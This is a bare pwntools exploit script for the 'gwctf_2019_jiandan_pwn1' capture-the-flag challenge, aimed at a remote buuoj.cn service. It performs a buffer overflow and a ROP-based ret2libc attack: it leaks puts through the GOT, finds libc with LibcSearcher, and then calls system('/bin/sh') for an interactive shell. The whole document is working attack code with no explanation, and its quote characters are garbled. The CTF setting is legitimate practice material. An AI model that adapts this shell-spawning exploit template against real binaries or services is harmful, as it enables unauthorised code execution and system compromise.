EXP
from pwn import *
from LibcSearcher import *
context(log_level = ‘debug‘,os = ‘linux‘,arch = ‘amd64‘)
#sh = process(‘./040-gwctf_2019_jiandan_pwn1‘)
sh = remote(‘node4.buuoj.cn‘, 27858)
elf = ELF(‘./040-gwctf_2019_jiandan_pwn1‘)
pop_rdi = 0x400843
puts_got = elf.got[‘puts‘]
puts_plt = elf.plt[‘puts‘]
main_addr = elf.symbols[‘main‘]
payload1 = flat(b‘A‘*0x10c, b‘\x18‘, pop_rdi, puts_got, puts_plt, main_addr)
sh.sendlineafter(‘fun!\n‘, payload1)
puts_addr = u64(sh.recvuntil(‘\n‘)[:-1].ljust(8, b‘\x00‘))
print(‘[+]puts_addr: ‘, hex(puts_addr))
ls = LibcSearcher(‘puts‘, puts_addr)
system_addr = puts_addr - ls.dump(‘puts‘) + ls.dump(‘system‘)
binsh_addr = puts_addr - ls.dump(‘puts‘) + ls.dump(‘str_bin_sh‘)
print(‘[+]system_addr: ‘, hex(system_addr))
print(‘[+]binsh_addr: ‘, hex(binsh_addr))
payload2 = flat(b‘A‘*0x10c, b‘\x18‘, pop_rdi, binsh_addr, system_addr)
sh.sendlineafter(‘fun!\n‘, payload2)
sh.interactive()
040-gwctf_2019_jiandan_pwn1